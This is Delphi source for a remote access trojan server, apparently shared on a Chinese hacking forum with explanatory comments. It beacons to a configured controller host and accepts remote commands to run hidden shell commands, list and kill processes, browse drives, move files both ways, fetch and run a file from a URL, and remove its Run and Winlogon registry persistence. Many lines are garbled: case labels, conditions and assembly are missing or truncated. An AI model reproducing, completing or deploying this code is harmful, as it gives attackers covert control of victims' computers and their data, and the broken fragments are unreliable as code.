- {南域剑盟 上兴QQ:51992
- 声明:程序由南域剑盟98exe.com成员网上搜集,不承担技术及版权问题}
- {随便加了点注释,文件传输不详细注了,大家网上找相关资料看}
- unit UServer;
- interface
- uses
- Windows, Messages, Winsock, Wininet, untCMDList, ShellApi, psApi, TLHelp32,
- untHTTPDownload,SysUtils2,URsConst;
- const
- version = '0.50B';
- LF = #10;
- CR = #13;
- EOL = CR + LF;
- { host : string = '';
- password : string = 'shj';
- port : integer = 80;
- }
- {文件属性常量}
- faReadOnly = $00000001; //只读文件
- faHidden = $00000002; //隐藏文件
- faSysFile = $00000004; // 系统文件
- faVolumeID = $00000008; // 卷标文件
- faDirectory = $00000010; // 目录
- faArchive = $00000020; //归档文件
- faAnyFile = $0000003F; // 任意文件
- ERROR_DISCONNECT = 01; // If server (remote connection disconnects)
- ERROR_FAIL = 02; // If server or client fails. Socket failures.
- ERROR_CONNECT = 03; // If client cant connect to server or reverse.
- ERROR_LISTEN = 04; // If server cant listen on choosen port.
- ERROR_ACCEPT = 05; // If server cant accept socket.
- ERROR_BREAK = 06; // If breaking from something.
- ERROR_LOSTCONNECTION = 07; // If server dies of some reason.
- ERROR_BIND = 08;
- SUCCESS_CONNECT = 09; // Connection established without problems.
- SUCCESS_FINISHED = 10; // Finished sending file without problems.
- SUCCESS_ACCEPT = 11; // Accepted remote connection fine.
- type
- TFileName = type string; //文件
- TSearchRec = record
- Time: Integer;
- Size: Integer;
- Attr: Integer;
- Name: TFileName;
- ExcludeAttr: Integer;
- FindHandle: THandle;
- FindData: TWin32FindData;
- end;
- LongRec = packed record
- case Integer of
- 0: (Lo, Hi: Word);
- 1: (Words: array[0..1] of Word);
- 2: (Bytes: array[0..3] of Byte);
- end;
- TInfo = record
- Name: string;
- Host: string;
- Port: Integer;
- Size: Integer;
- end;
- PInfo = ^TInfo;
- RemoteSock = Record
- Sock: TSocket;
- Count: Integer;
- End;
- rSock = ^RemoteSock;
- TServer = class(TObject)
- private
- Sock: TSocket;
- Addr: TSockAddrIn;
- WSA: TWSAData;
- TempSock :TSocket; //srv
- Remote :TSockAddr; //srv
- Len :Integer; //srv
- BlockList :Array[0..99] Of String; //srv
- public
- SocketList :Array[0..99] Of TSocket; //srv
- Port :Integer; //srv
- Count :Integer; //srv
- ReturnError :Integer; //srv
- Function Listen: Integer;
- Function AcceptNew(SSock: TSocket): Integer; //srv
- Function GetFreeHandle(VAR Int: Integer): Integer; //srv
- Function ReCount: Integer;
- Function Disconnect(dAddress, dPort: String): Boolean; //srv
- Procedure ResolveStatus(Int: Integer);
- procedure Connect;
- procedure SendData(Text: string);
- function GetNet: string;
- end;
- var
- Serv: TServer;
- PieZhi:TRedCtrl;
- ConFile:string;
- Info: TInfo;
- Port: Integer;
- Close: Boolean;
- LastDir: string;
- Host: string;
- Password: string;
- HandleList: Array[0..99] Of THandle;
- rSocket: RemoteSock;
- //判断网络是否链接--------------------------------------------
- function InternetGetConnectedStateEx(
- lpdwFlags: LPDWORD;
- lpszConnectionName: LPTSTR;
- dwNameLen: DWORD;
- dwReserved: DWORD): BOOL; stdcall;
- external 'wininet.dll' name 'InternetGetConnectedStateEx';
- procedure miniratMain;stdcall;
- implementation
- procedure SetRegValue(ROOT: hKey; Path, Value, Str: string);
- var
- Key: hKey;
- Size: Cardinal;
- begin
- RegOpenKey(ROOT, pChar(Path), Key); //打开给定键
- Size := 2048;
- RegSetValueEx(Key, pChar(Value), 0, REG_SZ, @Str[1], Size); //写注册表
- RegCloseKey(Key); //释放
- end;
- procedure SetDelValue(ROOT: hKey; Path, Value: string);
- var
- Key: hKey;
- Size: Cardinal;
- begin
- RegOpenKey(ROOT, pChar(Path), Key);
- Size := 2048;
- RegDeleteValue(Key, pChar(Value));
- RegCloseKey(Key);
- end;
- //写入注册表-----------------------------------------------
- procedure Uninstall;
- begin
- 'SoftwareMicrosoftWindowsCurrentVersionRun', dRegName);
- 'SoftwareMicrosoftWindowsCurrentVersionRun', dRegName);
- 'SoftwareMicrosoft NTWindowsCurrentVersionWinlogon', 'Shell',
- 'Explorer.exe');
- ExitProcess(0);
- end;
- function Enumeration(dRes: PNetResource; dI: Integer): string;
- var
- dHandle: THandle;
- K: DWord;
- BufferSize: DWord;
- Buffer: array[0..1023] of TNetResource;
- I: Word;
- Temp: string;
- begin
- WNetOpenEnum(2, 0, 0, dRes, dHandle);
- K := 1024; // 大小为1024
- BufferSize := SizeOf(Buffer); //获得盘
- while (WNetEnumResource(dHandle, K, @Buffer, BufferSize) = 0) do //获得资源
- for I := 0 to K - 1 do
- begin
- if (Buffer[I].dwDisplayType = RESOURCEDISPLAYTYPE_SERVER) then
- //显示类型为服务器(工作组)
- begin
- Temp := IntToStr(C_INFONETWORK) + ' ' + pChar(Buffer[I].lpRemoteName) +
- ' "' + pChar(Buffer[I].lpComment) + '"'#10;
- if (Pos(Temp, Result) = 0) then
- Result := Result + Temp;
- end;
- if (Buffer[I].dwUsage > 0) then
- begin
- Temp := Enumeration(@Buffer[I], 1);
- if (Pos(Temp, Result) = 0) then
- Result := Result + Temp;
- end;
- end;
- WNetCloseEnum(dHandle); // 获取所有目录
- end;
- function GetNetworkInfo: string;
- begin
- Result := IntToStr(C_INFONETWORK) + ' Domains Comments'#10 +
- Enumeration(nil, 0);
- end;
- //尾部加入资源,版本,地址,密码,端口------------------
- function GetServerInfo: string;
- begin
- Result := IntToStr(C_INFOSERVER) + ' Version ' + Version + #10 +
- IntToStr(C_INFOSERVER) + ' RmtAddr ' + PieZhi.dDnsHost + #10 +
- IntToStr(C_INFOSERVER) + ' Password ' + PieZhi.dPass + #10 +
- IntToStr(C_INFOSERVER) + ' SrvPort ' + PieZhi.dLocalPort + #10 +
- IntToStr(C_INFOSERVER) + ' RmtPort ' + PieZhi.dRemotePort + #10;
- end;
- //记录-----
- function GetInformation: string;
- var
- HostName: array[0..069] of Char;
- Sysdir: array[0..255] of Char;
- MemoryStatus: TMemoryStatus;
- Total: Integer;
- begin
- GetHostName(HostName, SizeOf(HostName));
- GetSystemDirectory(Sysdir, 256);
- MemoryStatus.dwLength := SizeOf(TMemoryStatus);
- GlobalMemoryStatus(MemoryStatus);
- Total := GetTickCount() div 1000;
- Result := IntToStr(C_INFOSYSTEM) + ' Hostname ' + Hostname + #10 +
- IntToStr(C_INFOSYSTEM) + ' System ' + string(SysDir) + #10 +
- IntToStr(C_INFOSYSTEM) + ' Memory(Total) ' +
- IntToStr(MemoryStatus.dwTotalPhys div 1048576) + ' MB Total'#10 +
- IntToStr(C_INFOSYSTEM) + ' Memory(Free) ' + IntToStr(MemoryStatus.dwAvailPhys
- div 1048576) + ' MB Free'#10 +
- IntToStr(C_INFOSYSTEM) + ' Memory(Used) ' +
- IntToStr(MemoryStatus.dwMemoryLoad) + '% In Use'#10 +
- IntToStr(C_INFOSYSTEM) + ' Uptime ' + IntToStr(Total div 86400) + ' days ' +
- IntToStr((Total mod 86400) div 3600) + ' hours ' +
- IntToStr(((Total mod 86400) mod 3600) div 60) + ' min ' +
- IntToStr((((Total mod 86400) mod 3600) mod 60) div 1) + ' sec'#10;
- end;
- //检查本机网络状态---------------------
- function TServer.GetNet: string;
- var
- W: DWord;
- Name: array[0..128] of Char;
- begin
- FillChar(Name, SizeOf(Name), 0);
- InternetGetConnectedStateEx(@W, Name, 128, 0); //检查连接internet状态
- Result := 'LAN (' + string(Name) + ')'
- else
- Result := 'Dial-Up (' + string(Name) + ')';
- end;
- // Send Data
- function SendData(Sock: TSocket; Text: string; var sByte: Cardinal): Integer;
- var
- Len: Integer;
- begin
- Result := Length(Text);
- Len := Send(Sock, Text[1], Length(Text), 0);
- Inc(sByte, Len);
- end;
- //下面基本都是功能了,文件的操作等
- procedure StripOutCmd(Text: string; var Cmd: string);
- begin Cmd := Copy(Text, 1, Pos(' ', Text) - 1);
- end;
- procedure StripOutParam(Text: string; var Param: array of string);
- var
- I: Word;
- begin
- if Text = '' then Exit;
- FillChar(Param, SizeOf(Param), 0);
- Delete(Text, 1, Pos(' ', Text));
- if Text = '' then Exit;
- if (Text[Length(Text)] <> ' ') then Text := Text + ' ';
- I := 0;
- while (Pos(' ', Text) > 0) do
- begin
- Param[I] := Copy(Text, 1, Pos(' ', Text) - 1);
- Inc(I);
- Delete(Text, 1, Pos(' ', Text));
- if (I >= 100) then Break;
- end;
- end;
- // 传递文件
- function RecvFile(P: Pointer): DWord; STDCALL;
- var
- Sock: TSocket;
- Addr: TSockAddrIn;
- WSA: TWSAData;
- BytesRead: Cardinal;
- F: file;
- Buf: array[0..8192] of Char;
- dErr: Integer;
- Name: string;
- Host: string;
- Port: Integer;
- Size: Integer;
- T: string;
- begin
- Name := PInfo(P)^.Name;
- Host := PInfo(P)^.Host;
- Port := PInfo(P)^.Port;
- Size := PInfo(P)^.Size;
- WSAStartUp($0101, WSA);
- Sock := Socket(AF_INET, SOCK_STREAM, 0);
- Addr.sin_family := AF_INET;
- Addr.sin_port := hTons(Port);
- Addr.sin_addr.S_addr := inet_Addr(pchar(Host));
- if (connect(Sock, Addr, SizeOf(Addr)) <> 0) then Exit;
- {$I-}
- T := 'ok';
- AssignFile(F, Name);
- Rewrite(F, 1);
- repeat
- FillChar(Buf, SizeOf(Buf), 0);
- dErr := Recv(Sock, Buf, SizeOf(Buf), 0);
- if (dErr > 0) then
- BlockWrite(F, Buf, dErr)
- else
- Break;
- Dec(Size, dErr);
- dErr := Send(Sock, T[1], Length(T), 0);
- until Size <= 0;
- CloseFile(F);
- {$I+}
- WSACleanUp();
- end;
- //定时检测
- function SendFile(P: Pointer): DWord; STDCALL;
- var
- Sock: TSocket;
- Addr: TSockAddrIn;
- WSA: TWSAData;
- BytesRead: Cardinal;
- F: file;
- Buf: array[0..8192] of Char;
- dErr: Integer;
- Name: string;
- Host: string;
- Port: Integer;
- T: string;
- begin
- Name := PInfo(P)^.Name;
- Host := PInfo(P)^.Host;
- Port := PInfo(P)^.Port;
- WSAStartUp($0101, WSA);
- Sock := Socket(AF_INET, SOCK_STREAM, 0);
- Addr.sin_family := AF_INET;
- Addr.sin_port := hTons(Port);
- Addr.sin_addr.S_addr := inet_Addr(pchar(Host));
- if (connect(Sock, Addr, SizeOf(Addr)) <> 0) then Exit;
- {$I-}
- T := 'ok';
- AssignFile(F, Name);
- Reset(F, 1);
- repeat
- BlockRead(F, Buf, SizeOf(Buf), BytesRead);
- if (BytesRead = 0) then Break;
- Send(Sock, Buf[0], SizeOf(Buf), 0);
- FillChar(Buf, SizeOf(Buf), 0);
- Recv(Sock, Buf, SizeOf(Buf), 0);
- until BytesRead = 0;
- CloseFile(F);
- {$I+}
- WSACleanUp();
- end;
- //取回的文件大小 ------------------------------
- function GetFileSize(FileName: string): Int64;
- var
- H: THandle;
- Data: TWIN32FindData;
- begin
- Result := -1;
- H := FindFirstFile(pChar(FileName), Data);
- begin
- Windows.FindClose(H);
- Result := Int64(Data.nFileSizeHigh) shl 32 + Data.nFileSizeLow;
- end;
- end;
- //将IP解释成主机名
- function RemoteAddr(Sock: TSocket): TSockAddrIn;
- var
- W: TWSAData;
- S: TSockAddrIn;
- I: Integer;
- begin
- WSAStartUP($0101, W);
- I := SizeOf(S);
- GetPeerName(Sock, S, I);
- WSACleanUP();
- Result := S;
- end;
- function RemoteAddress(Sock: TSocket): string;
- begin
- Result := INET_NTOA(RemoteAddr(Sock).sin_addr);
- end;
- function FindMatchingFile(var F: TSearchRec): Integer;
- var
- LocalFileTime: TFileTime; //文件创建的时间
- begin
- with F do
- begin
- while FindData.dwFileAttributes and ExcludeAttr <> 0 do
- if not FindNextFile(FindHandle, FindData) then
- begin
- Result := GetLastError;
- Exit;
- end;
- FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
- FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi, LongRec(Time).Lo);
- Size := FindData.nFileSizeLow;
- Attr := FindData.dwFileAttributes;
- Name := FindData.cFileName;
- end;
- Result := 0;
- end;
- procedure FindClose(var F: TSearchRec);
- begin
- if F.FindHandle <> INVALID_HANDLE_VALUE then
- begin
- Windows.FindClose(F.FindHandle);
- end;
- end;
- function FindFirst(const Path: string; Attr: Integer;
- var F: TSearchRec): Integer;
- const
- faSpecial = faHidden or faSysFile or faVolumeID or faDirectory;
- begin
- F.ExcludeAttr := not Attr and faSpecial;
- F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
- if F.FindHandle <> INVALID_HANDLE_VALUE then
- begin
- Result := FindMatchingFile(F);
- if Result <> 0 then FindClose(F);
- end
- else
- Result := GetLastError;
- end;
- function FindNext(var F: TSearchRec): Integer;
- begin
- if FindNextFile(F.FindHandle, F.FindData) then
- Result := FindMatchingFile(F)
- else
- Result := GetLastError;
- end;
- //找到的是个目录而不是文件...
- procedure GenerateList(ASock: TSocket; Dir: string; dNr: Integer);
- var
- SR: TSearchRec;
- Temp: string;
- Att: string;
- begin
- if (Dir = '') then Exit;
- if (Dir[Length(Dir)] <> '') then Dir := Dir + '';
- if FindFirst(Dir + '*.*', faDirectory or faHidden or faSysFile or faVolumeID or
- faArchive or faAnyFile, SR) = 0 then
- repeat
- if ((SR.Attr and faDirectory) = faDirectory) then
- begin
- Temp := IntToStr(C_REQUESTLIST) + ' DIR 0 ' + SR.Name + #10;
- if (dNr = 1) then
- Send(ASock, Temp[1], Length(Temp), 0);
- end
- else
- begin
- Att := '';
- if ((SR.Attr and faReadOnly) = faReadOnly) then
- Att := Att + 'ReadOnly/';
- if ((SR.Attr and faHidden) = faHidden) then Att := Att + 'Hidden/';
- if ((SR.Attr and faSysFile) = faSysFile) then Att := Att + 'SysFile/';
- if ((SR.Attr and faVolumeID) = faVolumeID) then
- Att := Att + 'VolumeID/';
- if ((SR.Attr and faArchive) = faArchive) then Att := Att + 'Archive/';
- if ((SR.Attr and faAnyFile) = faAnyFile) then Att := Att + 'AnyFile/';
- if Copy(Att, length(Att), 1) = '/' then
- Delete(Att, Length(Att), 1);
- Temp := IntToStr(C_REQUESTLIST) + ' ' + Att + ' ' + IntToStr(SR.Size) +
- ' ' + SR.Name + #10;
- if (dNr = 2) then
- Send(ASock, Temp[1], Length(Temp), 0);
- end;
- until FindNext(SR) <> 0;
- end;
- procedure CvtInt;
- asm
- JNZ @CvtLoop
- JNS @C2
- CALL @C2
- MOV AL,'-'
- @C2: MOV ECX,10
- @CvtLoop:
- ADD DL,'0'
- CMP DL,'0'+10
- JB @D2
- ADD DL,('A'-'0')-10
- @D2: MOV [ESI],DL
- JNE @D1
- JBE @D5
- MOV AL,'0'
- JMP @z
- @zloop: MOV [ESI+EDX],AL
- @z: DEC EDX
- JNZ @zloop
- @D5:
- end;
- function IntToHex(Value: Integer; Digits: Integer): string;
- asm
- CMP EDX, 32
- JBE @A1
- SUB ESP, 32
- MOV ECX, 16
- CALL CvtInt
- CALL System.@LStrFromPCharLen
- ADD ESP, 32
- end;
- //列出进程 + 列出模块 (查看PID, 线程, 模块)
- procedure ListProcess(ASock: TSocket;dInt: Integer);
- var
- CB: DWord;
- hMod_: HMODULE;
- hMod: array[0..300] of HMODULE;
- hProcess: THandle;
- hModule: THandle;
- hSnapShot: THandle;
- ProcessName: array[0..300] of Char;
- ModuleName: array[0..300] of Char;
- ProcessEntry: TProcessEntry32;
- Done: Boolean;
- Temp: string;
- Mods: Integer;
- I: Word;
- B: array[0..9] of Char;
- begin
- hSnapShot := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
- ProcessEntry.dwSize := SizeOf(ProcessEntry);
- Done := Process32First(hSnapShot, ProcessEntry);
- while Done do
- begin
- ProcessEntry.th32ProcessID);
- if (hProcess <> 0) then
- begin
- EnumProcessModules(hProcess, @hMod_, SizeOf(hMod_), CB);
- GetModuleFileNameExA(hProcess, hMod_, ProcessName, SizeOf(ProcessName));
- if (Pos('', ProcessName) > 0) then
- begin
- Temp := IntToStr(C_PROCESSLIST) + ' ' +
- IntToStr(ProcessEntry.cntThreads) + ' ' +
- IntToStr(ProcessEntry.th32ProcessID) + ' ' +
- IntToHex(ProcessEntry.th32ProcessID, 8) + ' ' +
- ProcessName + #10;
- Send(ASock, Temp[1], Length(Temp), 0);
- if (Recv(ASock, B[0], SizeOf(B), 0) <= 0) then
- begin
- CloseHandle(hProcess);
- CloseHandle(hSnapShot);
- Exit;
- end;
- if (dInt = 1) then
- begin
- EnumProcessModules(hProcess, @hMod, SizeOf(hMod), CB);
- Mods := CB div SizeOf(HMODULE);
- Temp := '';
- for I := 0 to Mods do
- begin
- GetModuleFilenameExA(hProcess, hMod[I], ModuleName,
- SizeOf(ModuleName));
- Temp := IntToStr(C_MODULELIST) + ' ' +
- IntToStr(ProcessEntry.th32ProcessID) + ' ' +
- ExtractFileName(ProcessName) + #1' ' +
- ModuleName + #10;
- Send(ASock, Temp[1], Length(Temp), 0);
- if (Recv(ASock, B[0], SizeOf(B), 0) <= 0) then
- begin
- CloseHandle(hProcess);
- CloseHandle(hSnapShot);
- Exit;
- end;
- end;
- end;
- end;
- CloseHandle(hProcess);
- end;
- Done := Process32Next(hSnapshot, ProcessEntry);
- end;
- CloseHandle(hSnapShot);
- end;
- procedure EndProcess(ASock: TSocket;dPID: string);
- var
- ProcessHandle: THandle;
- ReturnValue: Boolean;
- Temp: string;
- begin
- ProcessHandle := OpenProcess(PROCESS_TERMINATE, BOOL(0), StrToInt(dPID));
- ReturnValue := TerminateProcess(ProcessHandle, 0);
- if (not ReturnValue) then
- Temp := IntToStr(C_ENDPROCESS) + ' ' + dPID + ' 0'#10
- else
- Temp := IntToStr(C_ENDPROCESS) + ' ' + dPID + ' 1'#10;
- Send(ASock, Temp[1], Length(Temp), 0);
- end;
- function RunDosInCap(DosApp: string): string;
- const
- ReadBuffer = 24000;
- var
- Security: TSecurityAttributes;
- ReadPipe, WritePipe: THandle;
- start: TStartUpInfo;
- ProcessInfo: TProcessInformation;
- Buffer: Pchar;
- BytesRead, Apprunning: DWord;
- begin
- with Security do
- begin
- nlength := SizeOf(TSecurityAttributes);
- binherithandle := true;
- lpsecuritydescriptor := nil;
- end;
- if Createpipe(ReadPipe, WritePipe, @Security, 0) then
- begin
- Buffer := AllocMem(ReadBuffer + 1);
- FillChar(Start, Sizeof(Start), #0);
- start.cb := SizeOf(start);
- start.hStdOutput := WritePipe;
- start.hStdInput := ReadPipe;
- start.wShowWindow := SW_HIDE;
- if CreateProcess(nil, PChar(DosApp), @Security, @Security, true,
- NORMAL_PRIORITY_CLASS, nil, nil, start, ProcessInfo) then
- begin
- repeat
- Apprunning := WaitForSingleObject(ProcessInfo.hProcess, 100);
- until (Apprunning <> WAIT_TIMEOUT);
- repeat
- BytesRead := 0;
- ReadFile(ReadPipe, Buffer[0], ReadBuffer, BytesRead, nil);
- Buffer[BytesRead] := #0;
- OemToAnsi(Buffer, Buffer);
- Result := Result + string(Buffer);
- until (BytesRead < ReadBuffer);
- end;
- FreeMem(Buffer);
- CloseHandle(ProcessInfo.hProcess);
- CloseHandle(ProcessInfo.hThread);
- CloseHandle(ReadPipe);
- CloseHandle(WritePipe);
- end;
- end;
- procedure ReplaceStr(ReplaceWord, WithWord: string; var Text: string);
- var
- xPos: Integer;
- begin
- while Pos(ReplaceWord, Text) > 0 do
- begin
- xPos := Pos(ReplaceWord, Text);
- Delete(Text, xPos, Length(ReplaceWord));
- Insert(WithWord, Text, xPos);
- end;
- end;
- //文件传递
- procedure ReceiveData(AP: Pointer);STDCALL;
- var
- Buffer: array[0..1600] of Char;
- Data: string;
- Time: TTimeVal;
- FDS: TFDSet;
- D: Dword;
- Len: Integer;
- Port: Integer;
- Temp: string;
- Cmd: string;
- Param: array[0..100] of string;
- P: Integer;
- FName: string;
- LSock: TSocket;
- Count: Integer;
- rByte: Cardinal;
- sByte: Cardinal;
- begin
- LSock := rSock(AP)^.Sock;
- Count := rSock(AP)^.Count;
- // Address := RemoteAddress(Sock);
- // Port := RemotePort(Sock);
- rByte := 0;
- sByte := 0;
- repeat
- Time.tv_sec := 120;
- Time.tv_usec := 0;
- FD_SET(LSock, FDS);
- if Select(0, @FDS, nil, nil, @TIME) <= 0 then Break;
- Len := Recv(LSock, Buffer, 1600, 0);
- if (Len <= 0) then Break;
- Data := string(Buffer);
- ZeroMemory(@Buffer, SizeOf(Buffer));
- while (Pos(#10, Data) > 0) do
- begin
- Temp := Copy(Data, 1, Pos(#10, Data) - 1);
- Delete(Data, 1, Pos(#10, Data));
- StripOutCmd(Temp, Cmd);
- StripOutParam(Temp, Param);
- case StrToInt(Cmd) of
- begin
- Temp := IntToStr(C_DOWNLOAD) + ' ' + ExecuteFileFromURL(Param[0],
- Copy(Temp, Pos(Param[1], Temp), Length(Temp)));
- Send(LSock, Temp[1], Length(Temp), 0);
- Sleep(2000);
- ExitProcess(0);
- end;
- C_UNINSTALL: Uninstall;
- C_PASS: If (Param[0] <> Password) Then
- Begin
- SendData(LSock, '01 0'#10, sByte); //密码不正确
- CloseSocket(LSock);
- Break;
- End Else
- SendData(LSock, '01 1'#10, sByte); //密码正确
- begin
- Delete(Temp, 1, 2);
- if (FileExists(Temp)) then
- begin
- FName := ExtractFileName(Temp);
- repeat
- P := Pos(#32, FName);
- Delete(FName, P, 1);
- Insert('_', FName, P);
- until (Pos(#32, FName) = 0);
- Port := ((Random(9) + 1) * 1000) + Random(500);
- SendData(LSock,IntToStr(C_STARTTRANSFER)+' 0 '+IntToStr(GetFileSize(Temp))+' '+IntToStr(Port)+' '+FName+#10,sByte);
- Info.Name := Temp;
- Info.Host := RemoteAddress(LSock);
- Info.Port := Port;
- CreateThread(nil, 0, @SendFile, @Info, 0, D);
- end;
- end;
- begin
- (* C_PUTFILE size NewName#1 OldName *)
- Temp := Copy(Temp, Pos(Param[1], Temp), Length(Temp));
- FName := Copy(Temp, Pos(#1, Temp) + 2, Length(Temp));
- Temp := Copy(Temp, 1, Pos(#1, Temp) - 1);
- Port := ((Random(9) + 1) * 1000) + Random(500);
- SendData(LSock,IntToStr(C_STARTTRANSFER) + ' 1 ' + Param[0] + ' ' +
- IntToStr(Port) + ' ' + FName + #10,sByte);
- Info.Name := Temp;
- Info.Host := RemoteAddress(LSock);
- Info.Port := Port;
- Info.Size := StrToInt(Param[0]);
- CreateThread(nil, 0, @RecvFile, @Info, 0, D);
- end;
- C_INFOSYSTEM: SendData(LSock,GetInformation(),sByte);
- C_INFOSERVER: SendData(Lsock,GetServerInfo(),sByte);
- C_INFONETWORK: SendData(LSock,GetNetworkInfo(),sByte);
- begin
- SetLength(Temp, 300);
- GetLogicalDriveStrings(300, pChar(Temp));
- while (Pos(#0, Temp) > 0) and (pos('',temp)>0) and (Pos(':',Temp)>0) do
- begin
- FName := IntToStr(C_REQUESTDRIVE) + ' ' + Copy(Temp, 1, Pos(#0,
- Temp) - 1) + #10;
- Temp := Copy(Temp, Pos(#0, Temp) + 1, Length(Temp));
- Send(LSock, FName[1], Length(FName), 0);
- FName := '';
- end;
- end;
- begin
- Temp := Copy(Temp, Pos(Param[0], Temp), Length(Temp));
- GenerateList(LSock, Temp, 1);
- GenerateList(LSock,Temp, 2);
- LastDir := IntToStr(C_CURRENTPATH) + ' ' + Temp;
- if LastDir <> '' then
- if (LastDir[Length(LastDir)] <> '') then
- LastDir := LastDir + '';
- LastDir := LastDir + #10;
- end;
- C_CURRENTPATH: Send(LSock, LastDir[1], Length(LastDir), 0);
- begin
- Temp := Copy(Temp, Pos(Param[1], Temp), Length(Temp));
- ShellExecute(0, 'open', pChar(Temp), nil, nil, StrToInt(Param[0]));
- end;
- begin
- Temp := Copy(Temp, Pos(Param[0], Temp), Length(Temp));
- DeleteFile(pChar(Temp));
- end;
- begin
- ListProcess(LSock,StrToInt(Param[0]));
- Temp := IntToStr(C_FINISH) + ' '#10;
- Send(LSock, Temp[1], Length(Temp), 0);
- end;
- C_ENDPROCESS: EndProcess(LSock,Copy(Temp, 4, Length(Temp)));
- begin
- Temp := IntToStr(C_REMOTECMD) + ' ' +
- RunDosInCap(Copy(Temp, 4, Length(Temp)));
- ReplaceStr(#10, #1, Temp);
- Temp := Temp + #10;
- Send(LSock, Temp[1], Length(Temp), 0);
- end;
- end;
- end;
- until 1 = 2;
- CloseSocket(LSock);
- end;
- procedure TServer.SendData(Text: string);
- var
- dErr: Integer;
- begin
- dErr := Send(Sock, Text[1], Length(Text), 0);
- if (dErr = 0) then Exit;
- end;
- function ComputerName: string;
- var
- CNameBuffer: PChar;
- fl_loaded: Boolean;
- CLen: ^DWord;
- begin
- GetMem(CNameBuffer,255);
- New(CLen);
- CLen^:= 255;
- fl_loaded := GetComputerName(CNameBuffer,CLen^);
- if fl_loaded then
- Result := StrPas(CNameBuffer)
- else
- Result := 'Unkown';
- FreeMem(CNameBuffer,255);
- Dispose(CLen);
- end;
- // Function for creating sockets and listening.
- Function TServer.Listen: Integer; //srv type
- Begin
- WSAStartUp($0101, WSA);
- Count := 0;
- FillChar(SocketList, 99, 0);
- Sock := Socket(AF_INET, SOCK_STREAM, 0);
- Addr.sin_family := AF_INET;
- Addr.sin_port := hTons(Port);
- Addr.sin_addr.S_addr := INADDR_ANY;
- If (Bind(Sock, Addr, SizeOf(Addr)) <> 0) Then
- Begin
- Result := ERROR_BIND;
- ReturnError := Result;
- WSACleanUp();
- Exit;
- End;
- If (Winsock.listen(Sock, SOMAXCONN) <> 0) Then
- Begin
- Result := ERROR_LISTEN;
- ReturnError := Result;
- WSACleanUp();
- Exit;
- End;
- Len := SizeOf(Remote);
- Repeat
- TempSock := Accept(Sock, @Remote, @Len);
- If (TempSock = INVALID_SOCKET) Then
- Begin
- Result := ERROR_ACCEPT;
- ReturnError := Result;
- WSACleanUp();
- Exit;
- End;
- ResolveStatus(AcceptNew(TempSock));
- Until False;
- WSACleanUp();
- End;
- Function TServer.GetFreeHandle(VAR Int: Integer): Integer;
- Var
- I: WORD;
- Begin
- Result := -1;
- For I := 0 to 99 Do
- If (HandleList[I] = 0) Then
- Begin
- Result := I;
- Int := I;
- Break;
- End;
- End;
- // Remote Socket Port
- Function RemotePort(Sock: TSocket): String;
- Begin
- Result := IntToStr(nTohs(RemoteAddr(Sock).sin_port));
- End;
- Function TServer.ReCount: Integer;
- Var
- I: Word;
- Begin
- Result := 0;
- For I := 0 To 99 Do
- If (SocketList[I] > 0) Then
- Inc(Result);
- End;
- Function TServer.Disconnect(dAddress, dPort: String): Boolean;
- Var
- I: Word;
- J: Word;
- rHost: String;
- rPort: String;
- Begin
- For I := 0 To 99 Do
- Begin
- rHost := RemoteAddress(SocketList[I]);
- rPort := RemotePort(SocketList[I]);
- If (rHost = dAddress) and (rPort = dPort) Then
- Begin
- CloseSocket(SocketList[I]);
- SocketList[I] := INVALID_SOCKET;
- Break;
- End;
- End;
- End;
- // Report back to user at client GUI interface.
- Procedure TServer.ResolveStatus(Int: Integer);
- Begin
- { Case ReturnError Of
- ERROR_DISCONNECT: //'Error: Server disconnected.';
- ERROR_FAIL: //'Error: Failed.';
- ERROR_CONNECT: //'Error: Connection failed.';
- ERROR_LISTEN: //'Error: Listen failed.';
- ERROR_ACCEPT: //'Error: Accept of new server failed.';
- ERROR_BREAK: //'Error: "Break" used, procedure failed.';
- ERROR_LOSTCONNECTION: //'Error: Lost connection.';
- ERROR_BIND: //'Error: Bind failed.';
- SUCCESS_CONNECT: //'Connected successfully.';
- SUCCESS_FINISHED: //'Finished successfully.';
- SUCCESS_ACCEPT: //'Accepted new connection.';
- End;
- }
- End;
- Function TServer.AcceptNew(SSock: TSocket): Integer; //srv type
- Var
- I: Integer;
- D: DWord;
- Begin
- If (GetFreeHandle(I) = -1) or (SSock <= 0) Then
- Begin
- Result := ERROR_ACCEPT;
- Exit;
- End;
- rSocket.Sock := SSock;
- rSocket.Count := I;
- SocketList[I] := SSock;
- HandleList[I] := CreateThread(nil, 0, @ReceiveData, @rSocket, 0, D);
- Count := ReCount();
- End;
- procedure TServer.Connect;
- begin
- Password := PieZhi.dPass;
- Host := ResolveIP(PieZhi.dDnsHost);
- Port := StrToInt(PieZhi.dRemotePort);
- WSAStartUP($0101, WSA); //加载winsock库
- Close := False;
- repeat
- Sock := Socket(AF_INET, SOCK_STREAM, 0);
- Addr.sin_family := AF_INET;
- Addr.sin_port := hTons(Port);
- Addr.sin_addr.S_addr := inet_Addr(pChar(Host));
- if (Winsock.Connect(Sock, Addr, SizeOf(Addr)) = 0) then
- begin
- // SendData('01 ' + password + #10);
- SendData('02 ' + version + #10);
- SendData('03 ' + getnet + #10);
- SendData('20 ' + ComputerName + #10);
- rSocket.Sock := Sock;
- ReceiveData(@rSocket);
- end;
- Sleep(30000);
- LastDir := '';
- until (Close);
- WSACleanUP();
- end;
- procedure ReadFileStr(dName: string; var Content: string);
- var
- FContents: file of Char;
- FBuffer: array[1..1024] of Char;
- rLen: LongInt;
- FSize: LongInt;
- begin
- try
- Content := '';
- AssignFile(FContents, dName); // 访问正在使用的 文本文件
- Reset(FContents);
- FSize := FileSize(FContents);
- while not EOF(FContents) do
- begin
- BlockRead(FContents, FBuffer, 1024, rLen); // 读记录
- Content := Content + string(FBuffer);
- end;
- CloseFile(FContents);
- if Length(Content) > FSize then
- Content := Copy(Content, 1, FSize);
- except
- Exit;
- end;
- end;
- //间单加密一下--------------
- function EncryptText(Text: string): string;
- var
- I: Word;
- C: Word;
- begin
- Result := '';
- for I := 1 to Length(Text) do
- begin
- C := Ord(Text[I]);
- Result := Result + Chr((C xor 12));
- end;
- end;
- //读取所有配置信息 --------------
- procedure ReadSettings;
- var
- I: Word;
- Settings: string;
- FileContent: string;
- NewFileName: string;
- begin
- // NewFileName := ParamStr(0) + '_'; //生成文件名
- // CopyFile(pChar(ParamStr(0)), pChar(NewFileName), False); //复制
